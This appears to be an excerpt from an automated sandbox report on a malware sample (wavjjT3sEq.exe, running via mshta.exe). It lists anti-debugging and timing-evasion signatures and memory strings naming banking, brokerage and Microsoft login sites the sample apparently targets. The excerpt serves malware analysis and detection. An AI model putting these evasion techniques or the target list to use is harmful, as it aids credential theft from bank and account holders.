          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013AA8F rdtsc 0_2_0013AA8F
          Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7371Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 2600Jump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeAPI coverage: 0.7 %
          Source: C:\Windows\SysWOW64\mshta.exeAPI coverage: 2.6 %
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep count: 7371 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep time: -14742000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep count: 2600 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exe TID: 2752Thread sleep time: -5200000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -85000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep count: 37 > 30Jump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -55500s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep count: 42 > 30Jump to behavior
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe TID: 5040Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mshta.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_02F4C6D0 FindFirstFileW,FindNextFileW,FindClose,3_2_02F4C6D0
          Source: 1863I7301.3.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: discord.comVMware20,11696494690f
          Source: 1863I7301.3.drBinary or memory string: AMC password management pageVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: 1863I7301.3.drBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: 1863I7301.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: 1863I7301.3.drBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: 1863I7301.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: 1863I7301.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: 1863I7301.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: mshta.exe, 00000003.00000002.3902512217.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3908738865.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.1913962747.00000266053EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: 1863I7301.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: 1863I7301.3.drBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: 1863I7301.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: 1863I7301.3.drBinary or memory string: global block list test formVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: 1863I7301.3.drBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: 1863I7301.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: 1863I7301.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: 1863I7301.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: 1863I7301.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0013AA8F rdtsc 0_2_0013AA8F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_00137983 LdrLoadDll,0_2_00137983
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A019F mov eax, dword ptr fs:[00000030h]0_2_019A019F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A019F mov eax, dword ptr fs:[00000030h]0_2_019A019F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A019F mov eax, dword ptr fs:[00000030h]0_2_019A019F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A019F mov eax, dword ptr fs:[00000030h]0_2_019A019F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A197 mov eax, dword ptr fs:[00000030h]0_2_0191A197
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A197 mov eax, dword ptr fs:[00000030h]0_2_0191A197
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A197 mov eax, dword ptr fs:[00000030h]0_2_0191A197
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01960185 mov eax, dword ptr fs:[00000030h]0_2_01960185
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DC188 mov eax, dword ptr fs:[00000030h]0_2_019DC188
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DC188 mov eax, dword ptr fs:[00000030h]0_2_019DC188
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C4180 mov eax, dword ptr fs:[00000030h]0_2_019C4180
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C4180 mov eax, dword ptr fs:[00000030h]0_2_019C4180
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E1D0 mov eax, dword ptr fs:[00000030h]0_2_0199E1D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E1D0 mov eax, dword ptr fs:[00000030h]0_2_0199E1D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0199E1D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E1D0 mov eax, dword ptr fs:[00000030h]0_2_0199E1D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E1D0 mov eax, dword ptr fs:[00000030h]0_2_0199E1D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E61C3 mov eax, dword ptr fs:[00000030h]0_2_019E61C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E61C3 mov eax, dword ptr fs:[00000030h]0_2_019E61C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019501F8 mov eax, dword ptr fs:[00000030h]0_2_019501F8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F61E5 mov eax, dword ptr fs:[00000030h]0_2_019F61E5
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CA118 mov ecx, dword ptr fs:[00000030h]0_2_019CA118
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CA118 mov eax, dword ptr fs:[00000030h]0_2_019CA118
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CA118 mov eax, dword ptr fs:[00000030h]0_2_019CA118
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CA118 mov eax, dword ptr fs:[00000030h]0_2_019CA118
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E0115 mov eax, dword ptr fs:[00000030h]0_2_019E0115
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov ecx, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov ecx, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov ecx, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov eax, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE10E mov ecx, dword ptr fs:[00000030h]0_2_019CE10E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01950124 mov eax, dword ptr fs:[00000030h]0_2_01950124
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B8158 mov eax, dword ptr fs:[00000030h]0_2_019B8158
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926154 mov eax, dword ptr fs:[00000030h]0_2_01926154
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926154 mov eax, dword ptr fs:[00000030h]0_2_01926154
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C156 mov eax, dword ptr fs:[00000030h]0_2_0191C156
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B4144 mov eax, dword ptr fs:[00000030h]0_2_019B4144
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B4144 mov eax, dword ptr fs:[00000030h]0_2_019B4144
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B4144 mov ecx, dword ptr fs:[00000030h]0_2_019B4144
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B4144 mov eax, dword ptr fs:[00000030h]0_2_019B4144
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B4144 mov eax, dword ptr fs:[00000030h]0_2_019B4144
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192208A mov eax, dword ptr fs:[00000030h]0_2_0192208A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E60B8 mov eax, dword ptr fs:[00000030h]0_2_019E60B8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019E60B8 mov ecx, dword ptr fs:[00000030h]0_2_019E60B8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B80A8 mov eax, dword ptr fs:[00000030h]0_2_019B80A8
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A20DE mov eax, dword ptr fs:[00000030h]0_2_019A20DE
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C0F0 mov eax, dword ptr fs:[00000030h]0_2_0191C0F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019620F0 mov ecx, dword ptr fs:[00000030h]0_2_019620F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A0E3 mov ecx, dword ptr fs:[00000030h]0_2_0191A0E3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A60E0 mov eax, dword ptr fs:[00000030h]0_2_019A60E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019280E9 mov eax, dword ptr fs:[00000030h]0_2_019280E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E016 mov eax, dword ptr fs:[00000030h]0_2_0193E016
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E016 mov eax, dword ptr fs:[00000030h]0_2_0193E016
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E016 mov eax, dword ptr fs:[00000030h]0_2_0193E016
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E016 mov eax, dword ptr fs:[00000030h]0_2_0193E016
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A4000 mov ecx, dword ptr fs:[00000030h]0_2_019A4000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C2000 mov eax, dword ptr fs:[00000030h]0_2_019C2000
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6030 mov eax, dword ptr fs:[00000030h]0_2_019B6030
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A020 mov eax, dword ptr fs:[00000030h]0_2_0191A020
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C020 mov eax, dword ptr fs:[00000030h]0_2_0191C020
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922050 mov eax, dword ptr fs:[00000030h]0_2_01922050
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6050 mov eax, dword ptr fs:[00000030h]0_2_019A6050
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194C073 mov eax, dword ptr fs:[00000030h]0_2_0194C073
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01918397 mov eax, dword ptr fs:[00000030h]0_2_01918397
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01918397 mov eax, dword ptr fs:[00000030h]0_2_01918397
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01918397 mov eax, dword ptr fs:[00000030h]0_2_01918397
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E388 mov eax, dword ptr fs:[00000030h]0_2_0191E388
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E388 mov eax, dword ptr fs:[00000030h]0_2_0191E388
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E388 mov eax, dword ptr fs:[00000030h]0_2_0191E388
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194438F mov eax, dword ptr fs:[00000030h]0_2_0194438F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194438F mov eax, dword ptr fs:[00000030h]0_2_0194438F
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE3DB mov eax, dword ptr fs:[00000030h]0_2_019CE3DB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE3DB mov eax, dword ptr fs:[00000030h]0_2_019CE3DB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE3DB mov ecx, dword ptr fs:[00000030h]0_2_019CE3DB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019CE3DB mov eax, dword ptr fs:[00000030h]0_2_019CE3DB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C43D4 mov eax, dword ptr fs:[00000030h]0_2_019C43D4
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C43D4 mov eax, dword ptr fs:[00000030h]0_2_019C43D4
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DC3CD mov eax, dword ptr fs:[00000030h]0_2_019DC3CD
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A3C0 mov eax, dword ptr fs:[00000030h]0_2_0192A3C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019283C0 mov eax, dword ptr fs:[00000030h]0_2_019283C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019283C0 mov eax, dword ptr fs:[00000030h]0_2_019283C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019283C0 mov eax, dword ptr fs:[00000030h]0_2_019283C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019283C0 mov eax, dword ptr fs:[00000030h]0_2_019283C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A63C0 mov eax, dword ptr fs:[00000030h]0_2_019A63C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E3F0 mov eax, dword ptr fs:[00000030h]0_2_0193E3F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E3F0 mov eax, dword ptr fs:[00000030h]0_2_0193E3F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193E3F0 mov eax, dword ptr fs:[00000030h]0_2_0193E3F0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019563FF mov eax, dword ptr fs:[00000030h]0_2_019563FF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019303E9 mov eax, dword ptr fs:[00000030h]0_2_019303E9
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C310 mov ecx, dword ptr fs:[00000030h]0_2_0191C310
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01940310 mov ecx, dword ptr fs:[00000030h]0_2_01940310
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A30B mov eax, dword ptr fs:[00000030h]0_2_0195A30B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov ecx, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A035C mov eax, dword ptr fs:[00000030h]0_2_019A035C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019EA352 mov eax, dword ptr fs:[00000030h]0_2_019EA352
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C8350 mov ecx, dword ptr fs:[00000030h]0_2_019C8350
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A2349 mov eax, dword ptr fs:[00000030h]0_2_019A2349
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C437C mov eax, dword ptr fs:[00000030h]0_2_019C437C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E284 mov eax, dword ptr fs:[00000030h]0_2_0195E284
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E284 mov eax, dword ptr fs:[00000030h]0_2_0195E284
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A0283 mov eax, dword ptr fs:[00000030h]0_2_019A0283
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302A0 mov eax, dword ptr fs:[00000030h]0_2_019302A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302A0 mov eax, dword ptr fs:[00000030h]0_2_019302A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov ecx, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191823B mov eax, dword ptr fs:[00000030h]0_2_0191823B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A250 mov eax, dword ptr fs:[00000030h]0_2_0191A250
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926259 mov eax, dword ptr fs:[00000030h]0_2_01926259
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA250 mov eax, dword ptr fs:[00000030h]0_2_019DA250
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA250 mov eax, dword ptr fs:[00000030h]0_2_019DA250
